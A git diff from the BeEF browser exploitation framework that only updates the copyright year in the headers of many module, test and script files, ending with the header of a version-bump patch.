diff --git a/modules/social_engineering/clippy/module.rb b/modules/social_engineering/clippy/module.rb
index cc410b7c3..2adc4dd04 100755
--- a/modules/social_engineering/clippy/module.rb
+++ b/modules/social_engineering/clippy/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
index 632544f16..5facbda3a 100644
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
index 8d2ca0b50..c62fcb60d 100644
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb
index 88750a8b9..c1b4fd4b7 100644
--- a/modules/social_engineering/fake_flash_update/module.rb
+++ b/modules/social_engineering/fake_flash_update/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/gmail_phishing/command.js b/modules/social_engineering/gmail_phishing/command.js
index 2deb32a14..156bd65a3 100644
--- a/modules/social_engineering/gmail_phishing/command.js
+++ b/modules/social_engineering/gmail_phishing/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/social_engineering/gmail_phishing/config.yaml b/modules/social_engineering/gmail_phishing/config.yaml
index 6fdb19c82..c7c23a4f0 100644
--- a/modules/social_engineering/gmail_phishing/config.yaml
+++ b/modules/social_engineering/gmail_phishing/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb
index a31c93f1f..46e32c154 100644
--- a/modules/social_engineering/gmail_phishing/module.rb
+++ b/modules/social_engineering/gmail_phishing/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/lcamtuf_download/command.js b/modules/social_engineering/lcamtuf_download/command.js
index 599b5f8d9..c9888abe7 100644
--- a/modules/social_engineering/lcamtuf_download/command.js
+++ b/modules/social_engineering/lcamtuf_download/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/social_engineering/lcamtuf_download/config.yaml b/modules/social_engineering/lcamtuf_download/config.yaml
index 08cc18538..1fbd6d186 100644
--- a/modules/social_engineering/lcamtuf_download/config.yaml
+++ b/modules/social_engineering/lcamtuf_download/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/lcamtuf_download/module.rb b/modules/social_engineering/lcamtuf_download/module.rb
index 709c25ae3..f55c71d2e 100644
--- a/modules/social_engineering/lcamtuf_download/module.rb
+++ b/modules/social_engineering/lcamtuf_download/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js
index d82e00142..fea87a230 100644
--- a/modules/social_engineering/pretty_theft/command.js
+++ b/modules/social_engineering/pretty_theft/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/social_engineering/pretty_theft/config.yaml b/modules/social_engineering/pretty_theft/config.yaml
index d70ebbf26..849b74142 100644
--- a/modules/social_engineering/pretty_theft/config.yaml
+++ b/modules/social_engineering/pretty_theft/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb
index 3e0ae3579..bb58c0a8f 100644
--- a/modules/social_engineering/pretty_theft/module.rb
+++ b/modules/social_engineering/pretty_theft/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js
index 2563e4a48..3588356ff 100644
--- a/modules/social_engineering/simple_hijacker/command.js
+++ b/modules/social_engineering/simple_hijacker/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/social_engineering/simple_hijacker/config.yaml b/modules/social_engineering/simple_hijacker/config.yaml
index b43fa8a3e..73bb71cd3 100644
--- a/modules/social_engineering/simple_hijacker/config.yaml
+++ b/modules/social_engineering/simple_hijacker/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb
index c2df85220..b4c3b6c3f 100644
--- a/modules/social_engineering/simple_hijacker/module.rb
+++ b/modules/social_engineering/simple_hijacker/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/simple_hijacker/templates/amazon.js b/modules/social_engineering/simple_hijacker/templates/amazon.js
index f999f8ce5..386b1a5f3 100644
--- a/modules/social_engineering/simple_hijacker/templates/amazon.js
+++ b/modules/social_engineering/simple_hijacker/templates/amazon.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
index 77db95dc0..239821efb 100644
--- a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
+++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
index 47dec476a..59e2e509c 100644
--- a/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
+++ b/modules/social_engineering/simple_hijacker/templates/chromecertbeggar2.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/social_engineering/simple_hijacker/templates/confirmbox.js b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
index b7f89b47e..bb05de44d 100644
--- a/modules/social_engineering/simple_hijacker/templates/confirmbox.js
+++ b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/social_engineering/simple_hijacker/templates/credential.js b/modules/social_engineering/simple_hijacker/templates/credential.js
index da46794fe..9bea9453c 100644
--- a/modules/social_engineering/simple_hijacker/templates/credential.js
+++ b/modules/social_engineering/simple_hijacker/templates/credential.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/modules/social_engineering/tabnabbing/command.js b/modules/social_engineering/tabnabbing/command.js
index 4f122a166..d246bcb67 100644
--- a/modules/social_engineering/tabnabbing/command.js
+++ b/modules/social_engineering/tabnabbing/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/social_engineering/tabnabbing/config.yaml b/modules/social_engineering/tabnabbing/config.yaml
index 746618b2b..a0ebcb467 100644
--- a/modules/social_engineering/tabnabbing/config.yaml
+++ b/modules/social_engineering/tabnabbing/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/social_engineering/tabnabbing/module.rb b/modules/social_engineering/tabnabbing/module.rb
index 8320eb20e..3532efce9 100644
--- a/modules/social_engineering/tabnabbing/module.rb
+++ b/modules/social_engineering/tabnabbing/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/common/beef_test.rb b/test/common/beef_test.rb
index 51def3f77..6867e0344 100644
--- a/test/common/beef_test.rb
+++ b/test/common/beef_test.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/common/test_constants.rb b/test/common/test_constants.rb
index d5f487807..856161249 100644
--- a/test/common/test_constants.rb
+++ b/test/common/test_constants.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/common/ts_common.rb b/test/common/ts_common.rb
index 6dcd8c466..d865a913b 100644
--- a/test/common/ts_common.rb
+++ b/test/common/ts_common.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/integration/check_environment.rb b/test/integration/check_environment.rb
index 0eeb7190d..1b65fd7a8 100644
--- a/test/integration/check_environment.rb
+++ b/test/integration/check_environment.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/integration/tc_debug_modules.rb b/test/integration/tc_debug_modules.rb
index 2b0ec4b50..c5c3db680 100644
--- a/test/integration/tc_debug_modules.rb
+++ b/test/integration/tc_debug_modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/integration/tc_login.rb b/test/integration/tc_login.rb
index 72178dae2..698c2782e 100644
--- a/test/integration/tc_login.rb
+++ b/test/integration/tc_login.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/integration/ts_integration.rb b/test/integration/ts_integration.rb
index b16c9ec29..57d3a5ed2 100644
--- a/test/integration/ts_integration.rb
+++ b/test/integration/ts_integration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/thirdparty/msf/unit/check_environment.rb b/test/thirdparty/msf/unit/check_environment.rb
index 0eeb7190d..1b65fd7a8 100644
--- a/test/thirdparty/msf/unit/check_environment.rb
+++ b/test/thirdparty/msf/unit/check_environment.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/thirdparty/msf/unit/tc_metasploit.rb b/test/thirdparty/msf/unit/tc_metasploit.rb
index f3ed69bd9..644bce913 100644
--- a/test/thirdparty/msf/unit/tc_metasploit.rb
+++ b/test/thirdparty/msf/unit/tc_metasploit.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/thirdparty/msf/unit/ts_metasploit.rb b/test/thirdparty/msf/unit/ts_metasploit.rb
index 9e0448baf..189513fc3 100644
--- a/test/thirdparty/msf/unit/ts_metasploit.rb
+++ b/test/thirdparty/msf/unit/ts_metasploit.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/filter/tc_base.rb b/test/unit/core/filter/tc_base.rb
index d31036bb3..070268ede 100644
--- a/test/unit/core/filter/tc_base.rb
+++ b/test/unit/core/filter/tc_base.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/filter/tc_command.rb b/test/unit/core/filter/tc_command.rb
index a0983af32..c552303b9 100644
--- a/test/unit/core/filter/tc_command.rb
+++ b/test/unit/core/filter/tc_command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/main/network_stack/handlers/dynamicreconstruction.rb b/test/unit/core/main/network_stack/handlers/dynamicreconstruction.rb
index dfbf553ac..652a46867 100644
--- a/test/unit/core/main/network_stack/handlers/dynamicreconstruction.rb
+++ b/test/unit/core/main/network_stack/handlers/dynamicreconstruction.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/tc_api.rb b/test/unit/core/tc_api.rb
index 9500f51d0..30e894568 100644
--- a/test/unit/core/tc_api.rb
+++ b/test/unit/core/tc_api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/tc_autorun.rb b/test/unit/core/tc_autorun.rb
index 2095d4276..c7b42c431 100644
--- a/test/unit/core/tc_autorun.rb
+++ b/test/unit/core/tc_autorun.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/tc_bootstrap.rb b/test/unit/core/tc_bootstrap.rb
index 5c1c75daf..65cb3bffc 100644
--- a/test/unit/core/tc_bootstrap.rb
+++ b/test/unit/core/tc_bootstrap.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/tc_core.rb b/test/unit/core/tc_core.rb
index 28809675c..92cf89f71 100644
--- a/test/unit/core/tc_core.rb
+++ b/test/unit/core/tc_core.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/tc_loader.rb b/test/unit/core/tc_loader.rb
index d241de1aa..e56292728 100644
--- a/test/unit/core/tc_loader.rb
+++ b/test/unit/core/tc_loader.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/tc_logger.rb b/test/unit/core/tc_logger.rb
index 20352e8ce..2d561592c 100644
--- a/test/unit/core/tc_logger.rb
+++ b/test/unit/core/tc_logger.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/tc_modules.rb b/test/unit/core/tc_modules.rb
index 02157235f..a465a643f 100644
--- a/test/unit/core/tc_modules.rb
+++ b/test/unit/core/tc_modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/tc_obfuscation.rb b/test/unit/core/tc_obfuscation.rb
index 984cb1819..f0f429252 100644
--- a/test/unit/core/tc_obfuscation.rb
+++ b/test/unit/core/tc_obfuscation.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/core/tc_social_engineering.rb b/test/unit/core/tc_social_engineering.rb
index c88acbc76..ec11d7efc 100644
--- a/test/unit/core/tc_social_engineering.rb
+++ b/test/unit/core/tc_social_engineering.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/extensions/tc_event_logger.rb b/test/unit/extensions/tc_event_logger.rb
index c73a90332..a96eeb662 100644
--- a/test/unit/extensions/tc_event_logger.rb
+++ b/test/unit/extensions/tc_event_logger.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/extensions/tc_hackverter.rb b/test/unit/extensions/tc_hackverter.rb
index 18b69f7fc..3a9e68175 100644
--- a/test/unit/extensions/tc_hackverter.rb
+++ b/test/unit/extensions/tc_hackverter.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/extensions/tc_hooks.rb b/test/unit/extensions/tc_hooks.rb
index 708522f39..4865b9599 100644
--- a/test/unit/extensions/tc_hooks.rb
+++ b/test/unit/extensions/tc_hooks.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/extensions/tc_ipec_tunnel.rb b/test/unit/extensions/tc_ipec_tunnel.rb
index 205080c9d..1688eb5c5 100644
--- a/test/unit/extensions/tc_ipec_tunnel.rb
+++ b/test/unit/extensions/tc_ipec_tunnel.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/extensions/tc_proxy.rb b/test/unit/extensions/tc_proxy.rb
index 3bf37896b..5ff61946f 100644
--- a/test/unit/extensions/tc_proxy.rb
+++ b/test/unit/extensions/tc_proxy.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/extensions/tc_requester.rb b/test/unit/extensions/tc_requester.rb
index cc30942aa..81ef49702 100644
--- a/test/unit/extensions/tc_requester.rb
+++ b/test/unit/extensions/tc_requester.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/extensions/tc_vnc.rb b/test/unit/extensions/tc_vnc.rb
index 33f4db648..fd7608b7a 100644
--- a/test/unit/extensions/tc_vnc.rb
+++ b/test/unit/extensions/tc_vnc.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/extensions/tc_xssrays.rb b/test/unit/extensions/tc_xssrays.rb
index 4d9cbf463..253adeb09 100644
--- a/test/unit/extensions/tc_xssrays.rb
+++ b/test/unit/extensions/tc_xssrays.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/tc_filesystem.rb b/test/unit/tc_filesystem.rb
index 6cb1d893e..810ac44ff 100644
--- a/test/unit/tc_filesystem.rb
+++ b/test/unit/tc_filesystem.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/tc_grep.rb b/test/unit/tc_grep.rb
index a9d086fdd..accc2e29a 100644
--- a/test/unit/tc_grep.rb
+++ b/test/unit/tc_grep.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/test/unit/ts_unit.rb b/test/unit/ts_unit.rb
index 9012cee11..109e99ba6 100644
--- a/test/unit/ts_unit.rb
+++ b/test/unit/ts_unit.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/update-beef b/update-beef
index e5d775fb5..5491f0512 100755
--- a/update-beef
+++ b/update-beef
@@ -1,6 +1,6 @@
 #!/bin/bash
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

From 701dd34c831618fb34a3fab2022682ef3720350e Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Sun, 30 Dec 2012 12:48:45 +1000
Subject: [PATCH 125/397] Version number updated

---
 VERSION     | 2 +-
 config.yaml | 2 +-
